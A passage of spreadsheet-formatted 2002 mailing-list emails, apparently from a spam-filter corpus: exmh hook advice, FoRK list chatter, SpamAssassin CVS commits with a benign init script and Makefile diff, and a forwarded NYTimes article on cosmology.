    <t>Yes - I was going to suggest the folder change hooks as well.\nJust have them check for your custom comps file, and generate\nor update them if needed.\n \n&gt;&gt;&gt;Hal DeVore said:\n &gt; \n &gt; \n &gt; &gt;&gt;&gt;&gt;&gt; On Fri, 19 Jul 2002, "J" == J C Lawrence wrote:\n &gt; \n &gt;   J&gt; What would be great is if I could build the relevant comp\n &gt;   J&gt; file dynamically at runtime.\n &gt; \n &gt; Sure.  Use the "folder change" hooks.  Create a proc named\n &gt; Hook_FolderChangeSomething (where "Something" is meaningful and \n &gt; likely to be unique in the universe just in case you distribute \n &gt; this to others).  Put the proc in a file in your ~/.tk/exmh \n &gt; directory, regenerate the tclIndex, restart exmh.\n &gt; \n &gt; In that proc you can do anything you want, like rewrite your\n &gt; ~/Mail/comp file.\n &gt; \n &gt; \n &gt; --Hal\n &gt; \n &gt; \n &gt; \n &gt; \n &gt; _______________________________________________\n &gt; Exmh-users mailing list\n &gt; Exmh-users@redhat.com\n &gt; [URL]https://listman.redhat.com[/URL]\n\n--\nBrent Welch\nSoftware Architect, Panasas Inc\nPioneering the World's Most Scalable and Agile Storage Network\n[URL]www.panasas.com[/URL]\nwelch@panasas.com\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>https://listman.redhat.com www.panasas.com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Tue, 23 Jul 2002 11:14:28 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 11:14:28 -0700</t>
  </si>
  <si>
    <t>Re: (no subject)</t>
  </si>
  <si>
    <t>I've picked up these patches and will submit to CVS eventually. If there are bugs worth fixing, please let me know about the fixes for them. &gt;&gt;&gt;Mark Scarborough said:  &gt;   &gt; tg@sema.se said:  &gt; &gt;  mscar  said:  &gt; &gt;  &gt; My biggest problem with it is that it will _always_ render  the HTML  &gt; &gt;  &gt; in messages that are only HTML (possible speed and/or "I  didn't  &gt; &gt;  &gt; want to see that porno email" problems). Also, it does away  with  &gt; &gt;  &gt; the option to view an HTML part in Netscape. There might be  times  &gt; &gt;  &gt; when I want to use a more fully-featured viewer if I  determine that  &gt; &gt;  &gt; it's worth the risk.  &gt;   &gt;   &gt; &gt; Try these two patches (for exmh-2.5 07/13/2001) I just tossed  &gt; &gt; together.  &gt;   &gt; &gt; The config option $uri(deferDisplaysInline) probably doesn't  makes any  &gt; &gt; sense,  it should probably always be off. But you never know what  &gt; &gt; people like...  &gt;   &gt; &gt; Anyway, when you get a text/html part and you have defer  selected, you  &gt; &gt; can  display it inline by checking the box in the right-button  menu.  &gt;   &gt; &gt; /Tomas G.   &gt;   &gt;   &gt; Tomas,  &gt;   &gt; This is GREAT!  Thank you!  This is exactly what I was thinking  about as  &gt; the "best" solution whether I expressed it well or not.  &gt;   &gt; There are a couple of "coloring" or "highlighting" bugs that I  haven't had  &gt; time to fully characterize yet, but I don't care.  We can work out  the bugs  &gt; - at least we have the functionality.  &gt;   &gt; Everyone: if you have ever wanted to be able to choose between the  internal  &gt; HTML engine and whatever external browser you have defined - on a  per  &gt; message basis - give Tomas' patches a try.  &gt;   &gt; Thanks again Tomas.  &gt;   &gt; Mark  &gt;   &gt;   &gt;   &gt;   &gt; _______________________________________________  &gt; Exmh-users mailing list  &gt; Exmh-users@redhat.com  &gt; [URL]https://listman.redhat.com[/URL] -- Brent Welch Software Architect, Panasas Inc Pioneering the World's Most Scalable and Agile Storage Network [URL]www.panasas.com[/URL] welch@panasas.com _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Tue, 23 Jul 2002 10:08:31 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 10:08:31 -0700</t>
  </si>
  <si>
    <t>[Baseline] Raising chickens the high-tech way</t>
  </si>
  <si>
    <t>&gt;&gt;From Egg to Drummies: 10 Weeks From Farm to Food\nBy  Larry Barrett\n\n[URL]http://www.baselinemag.com[/URL],3959,369038,00.asp\n\nMy breasts have been halved, breaded and shipped to their current\nresting-place on a shelf in a supermarket in Denver. My legs should be\narriving in Moscow any time now. All my feathers have been processed and are\nnow being eaten by cattle somewhere in Texas. My blood and bones have been\nrendered for cat food, fertilizer and who-knows- what else. My wings have\nbeen seasoned with barbecue sauce and served with a side of ranch dressing\nand celery at some bar and grill in New York City. My feet? Well, they're\nheaded to Asia where I'm told they're something of a delicacy.\n\n-----------\n\nSo, a couple of things intrigued me about this byline, and its associated\nmain article:\nAnd On the 47th Day, This Chicken Went to Market\nBy  Debbie Gage\n[URL]http://www.baselinemag.com[/URL],3959,367672,00.asp\n\n- I had no idea how much computer controls played into the raising of\nlivestock\n- I had no idea how fast a chicken is raised these days\n\nIt also strikes me that it will not be very long before livestock is\ngenetically engineered to be dumber and meatier, and better adapted to\nliving in industrial conditions.\n\n- Jim\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.baselinemag.com http://www.baselinemag.com http://xent.com</t>
  </si>
  <si>
    <t>To: Lucas Gonze &lt;lgonze@panix.com&gt;, FoRK &lt;fork@spamassassin.taint.org&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 23 Jul 2002 10:06:17 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 10:06:17 -0700</t>
  </si>
  <si>
    <t>Lucas Gonze &lt;lgonze@panix.com&gt;, FoRK &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Joseph S. Barrera III wrote:\n\n&gt; And you. I especially hate you.\n\nBTW, guys, I'm *kidding*! I'm actually in a pretty good mood right now.\nI'm not actually a very hateful person, and I certainly can't think of\nanyone right now I hate, and certainly not anyone on this list!\n\n- Joe\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Tue, 23 Jul 2002 10:02:42 -0300</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 10:02:42 -0300</t>
  </si>
  <si>
    <t>&gt;\n&gt;\n&gt; The question then becomes, why is knowledge sharing such a difficult \n&gt; thing in organizations? Is it, perhaps, not as difficult as the \n&gt; grousers say? I mistrust the romantic, Rousseauian argument that man \n&gt; is basically good but society basically corrupt, and that the later \n&gt; stifles the natural altruistic impulses. After all, it's in society \n&gt; that we share, as well as hoard.  Is it that we think of "The \n&gt; Organization" as a machine, and like the research subjects get less \n&gt; neurological pleasure from cooperating with it than we would if it \n&gt; were humanized? Or ...?\n&gt;\n&gt;  \n&gt;\n\nWell, IMNHO, its because companies do not reward knowledge sharers. When \ntime comes for evaluation, there isn't a line on the page saying "Helped \nothers to succeed with their projects." Sharing inevitably cuts into the \ntime for personal productive work, and generally shows up as a red flag \nif your boss has a "management by exception"(1) style.\n\nOwen\n\n1. [URL]http://www.xrefer.com[/URL]\n\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.xrefer.com http://xent.com</t>
  </si>
  <si>
    <t>To: nan\nFrom: Lucas Gonze &lt;lgonze@panix.com&gt;\nDate: Tue, 23 Jul 2002 09:18:54 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 09:18:54 -0400 (EDT)</t>
  </si>
  <si>
    <t>&gt; - Joe\n&gt; \n&gt; P.S. I hate everybody.\n\none up: I hate everything post-(the first ten seconds of the universe),\nbut especially everybody and everything, and including but not limited to\npuppies and ice cream.\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Lucas Gonze &lt;lgonze@panix.com&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 23 Jul 2002 08:58:55 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 08:58:55 -0700</t>
  </si>
  <si>
    <t>Lucas Gonze wrote:\n&gt;&gt;- Joe\n&gt;&gt;\n&gt;&gt;P.S. I hate everybody.\n&gt; \n&gt; one up: I hate everything post-(the first ten seconds of the universe),\n&gt; but especially everybody and everything, and including but not limited to\n&gt; puppies and ice cream.\n\n\nAnd you. I especially hate you.\n\n- Joe\n-- \nThere is no place in which to hide\nEven truth is filled with lies\nDoubting angels fall to walk among the living\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Tue, 23 Jul 2002 08:34:02 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 08:34:02 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/spamd pld-rc-script.sh,NONE,1.1</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/spamd In directory usw-pr-cvs1:/tmp/cvs-serv21113/spamd Added Files: 	pld-rc-script.sh  Log Message: patch from Radoslaw Zielinski : rpm support for PLD Linux Distribution.  Makefile.PL created Makefile, which caused problems with DESTDIR; fixed. also rc-script for PLD --- NEW FILE: pld-rc-script.sh --- #!/bin/sh # # spamassassin This script starts and stops the spamd daemon # # chkconfig: 2345 80 30 # # description: spamd is a daemon process which uses SpamAssassin to check #              email messages for SPAM.  It is normally called by spamc #	           from a MDA. # processname:	spamassassin # pidfile:	/var/run/spamassassin.pid # Source function library. . /etc/rc.d/init.d/functions # Source networking configuration. . /etc/sysconfig/network # Source configureation. if [ -f /etc/sysconfig/spamassassin ] ; then 	. /etc/sysconfig/spamassassin fi # Check that networking is up. if is_no "${NETWORKING}"; then 	msg_Network_Down SpamAssassin 	exit 1 fi # See how we were called. case "$1" in   start) 	# Start daemon. 	if [ ! -f /var/lock/subsys/spamd ]; then 		msg_starting SpamAssassin 		daemon spamd -d -c -a 		RETVAL=$? 		[ $RETVAL -eq 0 ] &amp;&amp; touch /var/lock/subsys/spamd 	else 		msg_Not_Running SpamAssassin 	fi 	;;   stop) 	# Stop daemons. 	if [ -f /var/lock/subsys/spamd ]; then 		echo -n "Shutting down spamd: " 		killproc spamd 		RETVAL=$? 		rm -f /var/lock/subsys/spamd 	else 		msg_Already_Running SpamAssassin 	fi 	;;   restart) 	$0 stop 	$0 start 	;;   status) 	status spamd 	;;   *) 	msg_Usage "$0 {start|stop|restart|status}" 	exit 1 esac exit $RETVAL ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin MANIFEST,1.80,1.81 Makefile.PL,1.31,1.32</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin In directory usw-pr-cvs1:/tmp/cvs-serv21113 Modified Files: 	MANIFEST Makefile.PL  Log Message: patch from Radoslaw Zielinski : rpm support for PLD Linux Distribution.  Makefile.PL created Makefile, which caused problems with DESTDIR; fixed. also rc-script for PLD Index: MANIFEST =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/MANIFEST,v retrieving revision 1.80 retrieving revision 1.81 diff -u -d -r1.80 -r1.81 --- MANIFEST	23 Jul 2002 13:43:40 -0000	1.80 +++ MANIFEST	23 Jul 2002 15:34:00 -0000	1.81 @@ -123,3 +123,4 @@  tools/translation_prep.pl  masses/lint-rules-from-freqs  masses/freqdiff +spamd/pld-rc-script.sh Index: Makefile.PL =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/Makefile.PL,v retrieving revision 1.31 retrieving revision 1.32 diff -u -d -r1.31 -r1.32 --- Makefile.PL	4 Jul 2002 14:26:15 -0000	1.31 +++ Makefile.PL	23 Jul 2002 15:34:00 -0000	1.32 @@ -1,6 +1,6 @@  require 5.005;   -my $DEF_RULES_DIR	= '$(PREFIX)/share/spamassassin'; +my $DEF_RULES_DIR	= '$(DESTDIR)$(PREFIX)/share/spamassassin';    my $LOCAL_RULES_DIR	= '/etc/mail/spamassassin';   @@ -83,7 +83,7 @@      # do this with MakeMaker without it trying to build the perl      # modules as .so's :(   -qq{ +qq#    RULES		= $rulesfiles   @@ -98,7 +98,7 @@  DEF_RULES_DIR	= $DEF_RULES_DIR  LOCAL_RULES_DIR	= $LOCAL_RULES_DIR   -}. q{ +#. q#    pm_to_blib: spamassassin doc/.made   @@ -159,5 +159,6 @@  	touch doc/.made  	-rm -f pod2htm*   -}; +#; +  } ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: khare@alumni.caltech.edu\nDate: Tue, 23 Jul 2002 05:23:43 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 05:23:43 -0400 (EDT)</t>
  </si>
  <si>
    <t>NYTimes.com Article: In the Beginning ...</t>
  </si>
  <si>
    <t>This article from NYTimes.com \nhas been sent to you by khare@alumni.caltech.edu.\n\n\nI'm sure that at the end of the universe, they'll still only find Douglas Adams, calmly munching away on his mooburger :-)\n\nThe prospect of expansion so rapid that the night sky empties out because other galaxies are simply *outside* our light cone -- ??!? -- is really chilling. \n\nPuts comm latency in a whole new perspective... what if, in the future, processors go so fast there *is* no network? Or, at least, TCP segments would arrive so rarely they would seem as inscrutable as commandments from the heavens...\n\nRohit\n\nkhare@alumni.caltech.edu\n\n\nIn the Beginning ...\n\nJuly 23, 2002\nBy DENNIS OVERBYE \n\n\n\n\n \n\nIt has always been easy to make fun of cosmologists,\nconfined to a dust mote lost in space, pronouncing judgment\non the fate of the universe or the behavior of galaxies\nbillions of light-years away, with only a few scraps of\nlight as evidence. \n\n"Cosmologists are often wrong," the Russian physicist Lev\nLandau put it, "but never in doubt." \n\nFor most of the 20th century, cosmology seemed less a\nscience than a religious war over, say, whether the\nuniverse had a beginning, in a fiery Big Bang billions of\nyears ago, or whether it exists eternally in the so-called\nSteady State. \n\n\n\nIn the last few years, however, a funny thing has happened.\nCosmologists are beginning to agree with one another.\nBlessed with new instruments like the Hubble Space\nTelescope and other space-based observatories, a new\ngeneration of their giant cousins on the ground and\never-faster computer networks, cosmology is entering "a\ngolden age" in which data are finally outrunning\nspeculation. \n\n"The rate at which we are learning and discovering new\nthings is just extraordinary," said Dr. Charles Bennett, an\nastronomer at the Goddard Space Flight Center in Greenbelt,\nMd. \n\nAs a result, cosmologists are beginning to converge on what\nthey call a "standard model" of the universe that is\ntowering in its ambition. It purports to trace, at least in\nbroad strokes, cosmic history from the millisecond after\ntime began, when the universe was a boiling stew of energy\nand subatomic particles, through the formation of atoms,\nstars, galaxies and planets to the vast, dilute, dark\nfuture in which all of these will have died. \n\nThe universe, the cosmologists say, was born 14 billion\nyears ago in the Big Bang. Most of its material remains\nresides in huge clouds of invisible so-called dark matter,\nperhaps elementary particles left over from the primordial\nexplosion and not yet identified. \n\nWithin these invisible clouds, the glittery lights in the\nsky that have defined creation for generations of humans\nare swamped, like flecks of foam on a rolling sea. A good\ncase can be made, scientists now agree, that the universe\nwill go on expanding forever. \n\nIn fact, recent observations have suggested that the\nexpansion of the universe is speeding up over cosmic time,\nunder the influence of a "dark energy" even more mysterious\nthan dark matter. \n\nRecently, a group of astronomers led by Dr. William\nPercival at the University of Edinburgh combined data from\na variety of observations to compile, based on the simplest\ntheoretical model, what they say is the most precise\nenumeration yet of the parameters that cosmologists have\nbeen fighting about for all these decades. \n\nThe universe, they calculated, is 13.89 billion years old,\nplus or minus half a billion years. Only 4.8 percent of it\nis made of ordinary matter. Matter of all types, known and\nunknown, luminous and dark, accounts for just 27.5 percent.\nThe rest of creation, 72.5 percent, is the mysterious dark\nenergy, they reported in a paper submitted last month to\nThe Monthly Notices of the Royal Astronomical Society. \n\nIt is a picture that in some ways is surprisingly simple,\nsatisfying long-held theoretical prejudices about how the\nuniverse should be designed. Continued agreement with\ncoming experiments may mean that science is approaching the\nend of a "great program" of cosmological tests that began\nin the 1930's, Dr. P. J. E. Peebles of Princeton and Dr.\nBharat Ratra of Kansas State University said in the draft\nof a coming article for The Reviews of Modern Physics. \n\nIn other ways this new dark universe is utterly baffling, a\nroad map to new mysteries. Dr. Marc Davis, a cosmologist at\nthe University of California at Berkeley, called it "a\nuniverse chock full of exotics that don't make sense to\nanybody." \n\nMoreover there are some questions that scientists still do\nnot know how to ask, let alone answer, scientifically. Was\nthere anything before the Big Bang? Is there a role for\nlife in the cosmos? Why is there something rather than\nnothing at all? Will we ever know? \n\n"We know much, but we still understand very little," said\nDr. Michael Turner, a cosmologist at the University of\nChicago. \n\nThe Big Question \n\nExpanding Forever, \nOr Big Crunch? \n\nThe dim caves of Lascaux, the plains of\nStonehenge and the dreamtime tales of Australian aborigines\nall testify to the need to explain the world and existence.\nThis quest took its present form in 1917. That was when\nAlbert Einstein took his new general theory of relativity,\nwhich explained how matter and energy warp space-time to\nproduce gravity, and applied it to the universe. \n\nEinstein discovered that the cosmos as his theory described\nit would be unstable, prone to collapse under its own\ngravity. Astronomers, however, were sure that the universe\nwas stable. So Einstein added a fudge factor that he called\nthe cosmological constant to his equations. It acted as a\nlong-range repulsive force to counterbalance gravity. \n\nIn 1929, the astronomer Edwin Hubble discovered that the\nuniverse was expanding. The sky was full of distant\ngalaxies all rushing away from us and one another, as if\npropelled by what the British astronomer Dr. Fred Hoyle\nlater called derisively a "big bang." The universe was not\nstable and, thus, did not require counterbalancing.\nEinstein abandoned his constant, referring to it as his\nbiggest blunder. But it would return to haunt cosmologists,\nand the universe. \n\nHoyle's term stuck, and the notion of an explosive genesis\nbecame orthodoxy in 1965, when Dr. Arno Penzias and Dr.\nRobert Wilson, radio astronomers at Bell Laboratories,\ndiscovered a faint uniform radio glow that pervaded the\nsky. It was, cosmologists concluded, the fading remnant of\nthe primordial fireball itself. \n\nRelieved of their fudge factor, the equations describing\nEinstein's universe were simple. Dr. Allan Sandage, the\nCarnegie Observatories astronomer, once called cosmology\n"the search for two numbers" - one, the Hubble constant,\ntelling how fast the universe is expanding, and the other\ntelling how fast the expansion is slowing, and thus whether\nthe universe will expand forever or not. \n\nThe second number, known as the deceleration parameter,\nindicated how much the cosmos had been warped by the\ndensity of its contents. In a high-density universe, space\nwould be curved around on itself like a ball. Such a\nuniverse would eventually stop expanding and fall back\ntogether in a big crunch that would extinguish space and\ntime, as well as the galaxies and stars that inhabit them.\nA low-density universe, on the other hand, would have an\nopposite or "open" curvature like a saddle, harder to\nenvision, and would expand forever. \n\nIn between with no overall warpage at all was a\n"Goldilocks" universe with just the right density to expand\nforever but more and more slowly, so that after an infinite\ntime it would coast to a stop. This was a "flat" universe\nin the cosmological parlance, and to many theorists the\nsimplest and most mathematically beautiful solution of all.\n\n\nBut the sky did not yield those cosmic numbers easily, even\nwith the help of the 200-inch Hale telescope on Palomar\nMountain in Southern California, dedicated in 1948, which\nhad been built largely for that task. Dr. Hubble wrote of\nmeasuring shadows and searching "among ghostly errors of\nmeasurement for landmarks that are scarcely more\nsubstantial." \n\nThe Dark Side \n\nInvisible Matter \nMolds Galaxies \n\n\nIt was not till the mid-70's, a\nquarter-century after the Palomar giant began operating,\nthat groups of astronomers reached the tentative conclusion\nthat the universe they could see - stars, gas, planets and\ngalaxies - did not have nearly enough gravitational oomph\nto stop the cosmic expansion. \n\n"So the universe will continue to expand forever and\ngalaxies will get farther and farther apart, and things\nwill just die," Dr. Sandage said at the time. \n\nBut the Great Argument was just beginning. Apparently there\nwas a lot of the universe that astronomers could not see.\nThe stars and galaxies, were moving as if immersed in the\ngravity of giant invisible clouds of so-called dark matter\n- "missing matter" the Swiss astronomer Dr. Fritz Zwicky\nlabeled it in the 1930's. \n\nMany galaxies, for example, are rotating so fast that they\nwould fly apart unless they were being reined in by the\ngravity of halos of dark matter, according to pioneering\nobservations by Dr. Vera Rubin of the Carnegie Institution\nof Washington and her colleagues. Her measurements\nindicated that these dark halos outweighed the visible\ngalaxies themselves from 5 to 10 times. But there could be\neven more dark matter farther out in space, perhaps enough\nto stop the expansion of the universe, eventually, some\ntheorists suggested. Luminous matter, the Darth Vaders of\nthe sky said, is like the snow on mountaintops. \n\nBut what is the dark matter? While some of it is gas or\ndark dim objects like stars and planets, cosmologists\nspeculate that most of it is subatomic particles left over\nfrom the Big Bang. \n\nMany varieties of these particles are predicted by theories\nof high-energy physics. But their existence has not been\nconfirmed or detected in particle accelerators. \n\n"We theorists can invent all sorts of garbage to fill the\nuniverse," Dr. Sheldon Glashow, a Harvard physicist and\nNobel laureate, told a gathering on dark matter in 1981. \n\nCollectively known as WIMP's, for weakly interacting\nmassive particles, such particles would not respond to\nelectromagnetism, the force responsible for light, and thus\nwould be unable to radiate or reflect light. They would\nalso be relatively slow-moving, or "cold" in physics\njargon, and thus also go by the name of cold dark matter. \n\nAs Earth in its travels passed through the dark-matter\ncloud that presumably envelops the Milky Way, the particles\nwould shoot through our bodies, rarely leaving a trace,\nlike moonlight through a window. \n\nBut the collective gravity of such particles, cosmologists\nsay, would shape the cosmos and its contents. \n\nGathering along the fault lines laid down by random\nperturbations of density in the early universe, dark matter\nwould congeal into clouds with about the mass of 100,000\nSuns. The ordinary matter that was mixed in with it would\ncool and fall to the centers of the clouds and light up as\nstars. \n\nThe clouds would then attract other clouds. Through a\nseries of mergers over billions of years, smaller clouds\nwould assemble into galaxies, and the galaxies would then\nassemble themselves into clusters of thousands of galaxies,\nand so forth. \n\nUsing the Hubble and other telescopes as time machines -\nlight travels at a finite speed, so the farther out\nastronomers look the farther back in time they see -\ncosmologists have begun to confirm that the universe did\nassemble itself from the "bottom up," as the dark matter\nmodel predicts. \n\nLast year, two teams of astronomers reported seeing the\nfirst stars burning their way out of the cloudy aftermath\nof the Big Bang, when the universe was only 900 million\nyears old. The bulk of galaxy formation occurred when the\nuniverse was a half to a quarter its present age,\ncosmologists say. \n\n"The big news in the last decade is that even half a\nuniverse ago the universe looked pretty different," said\nDr. Alan Dressler of the Carnegie Observatories in\nPasadena. Galaxies before then were small and irregular,\nwith no sign of the majestic spiral spider webs that\ndecorate the sky today. \n\nWe would barely recognize our own Milky Way galaxy, if we\ncould see it five billion years ago when the Sun formed, he\nsaid. \n\n"By eight billion years back, it would be unrecognizable,"\nsaid Dr. Dressler. \n\nYet there are still many questions that the cold dark\nmatter model does not answer. Astronomers still do not\nknow, for example, how the first stars formed or why the\nmodels of dark matter distribution don't quite fit in the\ncores of some kinds of galaxies. Nor have the dark matter\nparticles themselves been unambiguously detected or\nidentified, despite continuing experiments. \n\nSome astronomers suggest that the discrepancies stem from\nthe inability of simple mathematical models to deal with\nmessy details of the real world. \n\n"It's a huge mystery exactly how stars form," Dr. Richard\nBond of the Canadian Institute for Theoretical Astrophysics\nsaid. "We can't solve it now. So it's even harder to try to\nsolve them back then." \n\nBut others, notably Dr. Mordehai Milgrom, a theorist at the\nWeizmann Institute in Israel, have suggested that modifying\nthe gravitational laws by which dark matter was deduced in\nthe first place would alleviate the need for dark matter\naltogether. \n\nThe Bang's Fuel \n\nInflating One Ounce \nTo a Whole Universe \n\n\nClues to what had actually exploded\nin the Big Bang emerged as an unexpected gift from another\ngreat scientific quest: physicists' pursuit for a so-called\ntheory of everything that would unite all physical\nphenomena in a single equation. Unable to build machines\npowerful enough to test their most ambitious notions on\nEarth, some theorists turned to the sky. \n\n"The Big Bang is the poor man's particle accelerator," Dr.\nJakob Zeldovich, an influential Russian cosmologist, said. \n\nPhysicists recognize four forces at work in the world\ntoday - gravity, electromagnetism, and the strong and weak\nnuclear forces. But they suspect, based on data from\nparticle accelerators and high-powered theory, that those\nare simply different manifestations of a single unified\nforce that ruled the universe in its earliest, hottest\nmoments. \n\nAs the universe cooled, according to this theory, there was\na fall from grace, and the laws of physics evolved, with\none force after another "freezing out," or splitting away. \n\nIn 1979, Dr. Alan Guth, now at the Massachusetts Institute\nof Technology, realized that a hypothesized glitch in this\nprocess would have had drastic consequences for the\nuniverse. Under some circumstances, a glass of water can\nstay liquid as the temperature falls below 32 degrees,\nuntil it is disturbed, at which point it will rapidly\nfreeze, releasing latent heat in the process. Similarly,\nthe universe could "supercool" and stay in a unified state\ntoo long. In that case, space itself would become\ntemporarily imbued with a mysterious kind of latent heat,\nor energy. \n\nInserted into Einstein's equations, the latent energy would\nact as a kind of antigravity, and the universe would blow\nitself apart, Dr. Guth discovered in a calculation in 1979.\n\n\nIn far less than the blink of an eye, 10-37 second, a speck\nmuch smaller than a proton would have swollen to the size\nof a grapefruit and then resumed its more stately\nexpansion, with all of normal cosmic history before it,\nresulting in today's observable universe - a patch of sky\nand stars 14 billion light-years across. All, by the\nmagical-seeming logic of Einstein's equations, from about\nan ounce of primordial stuff. \n\n"The universe," Dr. Guth liked to say, "might be the\nultimate free lunch." \n\nDr. Guth called his theory inflation. Inflation, as Dr.\nGuth pointed out, explains why the universe is expanding.\nDr. Turner of the University of Chicago referred to it as\n"the dynamite behind the Big Bang." \n\nAs modified and improved by Dr. Andrei Linde, now at\nStanford, and by Dr. Paul Steinhardt, now at Princeton and\nDr. Andreas Albrecht now at the University of California at\nDavis, inflation has been the workhorse of cosmology ever\nsince. One of its great virtues, cosmologists say, is that\ninflation explains the origin of galaxies, the main\ncitizens of the cosmos. The answer comes from the\nparadoxical-sounding quantum rules that govern subatomic\naffairs. On the smallest scales, according to quantum\ntheory, nature is lumpy, emitting even energy in little\nbits and subject to an irreducible randomness. As a result,\nso-called quantum fluctuations would leave faint lumps in\nthe early universe. These would serve as the gravitational\nseeds for future galaxies and other cosmic structures. \n\nAs a result of such successes, cosmologists have stuck with\nthe idea of inflation, even though, lacking the ability to\ntest their theories at the high energies of the Big Bang,\nthey have no precise theory about what might have actually\ncaused it. "Inflation is actually a class of theories,"\nsaid Dr. Guth. \n\nIn the latest version, called "chaotic inflation," Dr.\nLinde has argued that quantum fluctuations in a myriad of\ntheorized force fields could have done the trick. \n\nIndeed, he and others now say they believe that inflation\ncan occur over and over, spawning an endless chain of\nuniverses out of one another, like bubbles within bubbles. \n\n"The universe inflates on top of itself," Dr. Linde told a\nphysics conference this spring in Princeton. "It's\nhappening right now." \n\nThe Golden Age \n\nNew Devices Detect \nPrimordial Glow \nIf the inflationary\ntheorists are right, the universe we see, the 14 billion\nlight-years, is just a tiny piece of a much vaster\nuniverse, or even a whole ensemble of them, forever out of\nour view. \n\nAccording to the theory, therefore, our own little patch of\nthe cosmos should appear geometrically "flat," the way a\nsection of a balloon looks flat when viewed close up. This\nwas the universe long thought to be the most beautiful and\nsimple. \n\nBut it required, by the logic of Einstein's general\nrelativity, that there be much more dark matter, or\nsomething, to the universe, enough to "flatten" space-time,\nthan astronomers had found. \n\nIn fact, this prescription was so hard to reconcile with\nother observations, of galaxies and their evolutions, that\nby 1991 some astronomers and press reports suggested that\nthe entire theoretical edifice of inflation to blow up the\nuniverse and cold dark matter to fill it, not to say the\nBig Bang itself, might have to be junked. \n\nSo it was with a sigh of relief that cosmologists greeted\nthe announcement in April 1992 that NASA's Cosmic\nBackground Explorer, or COBE, satellite had succeeded in\ndiscerning faint blotches in the primordial cosmic radio\nglow. \n\nThese were the seeds from which, inflation predicted, large\ncosmic structures would eventually grow. \n\n"If you're religious, it's like seeing God," said Dr.\nGeorge Smoot, a physicist from the Lawrence Berkeley\nNational Laboratory who led the COBE team. \n\nAstronomers say COBE signaled a transition in which heroic\nideas about the universe began to be replaced by heroic\ndata, as long-planned new telescopes and other instruments\nwent into operation. \n\nA year later, skywalking astronauts corrected the Hubble\ntelescope's myopic vision. The cosmic background radiation\nhas come in for particular scrutiny from new radio\ntelescopes mounted in balloons and on mountaintops. The\nnews has been good, though not decisive, for inflation. \n\nFor three years, a series of increasingly high-resolution\nobservations has confirmed that the pattern of blotches\nstippling the remnant of the primordial fireball is\nconsistent with the predictions from inflation and cold\ndark matter. The instruments have now mapped details small\nenough to have been the seeds of modern clusters of\ngalaxies. \n\n"I'm completely snowed by the cosmic background radiation,"\nDr. Guth said. "The signal was so weak it wasn't even\ndetected until 1965, and now they're measuring fluctuations\nof one part in 100,000." \n\nPerhaps most important, the analysis of the fluctuations\nindicates that the universe has a "flat" geometry, as\npredicted by inflation. That was a triumph. Although\nobservations could not prove that inflation was right, a\nnonflat universe would have been a blow to the theory, and\nto cosmological orthodoxy. \n\n"Inflation, our boldest and most promising theory of the\nearliest moments of creation, passed its first very\nimportant test," Dr. Turner said at the time. \n\nThe most precise measurements of the cosmic background, at\nleast in the near future, are generally expected to come\nlate this year from NASA's Microwave Anisotropy Project, or\nMAP, satellite, which was launched into space last year on\nJune 30. MAP will be followed by the European Space\nAgency's Planck satellite, in 2006. \n\nIt is highly unlikely that MAP or Planck will be able to\ndetect what Dr. Turner calls "the smoking gun signature of\ninflation." The violent stretching of the universe should\nroil space-time with so-called gravitational waves that\nwould leave a faint imprint on the cosmic fireball. \n\nDetecting those waves would not only confirm inflation, but\nalso might help scientists establish what caused the\ninflation in the first place, giving science its first look\nat the strange physics that prevailed when creation was\nonly about a trillionth of a trillionth of a trillionth of\na second old. \n\nThe Universe's Fate \n\nBleak Implications \nOf `Dark Energy' \n\nIn 1998, two competing teams of\nastronomers startled the scientific world with the news\nthat the expansion of the universe seemed to be speeding up\nunder the influence of a mysterious antigravity that seems\nembedded in space itself and that is 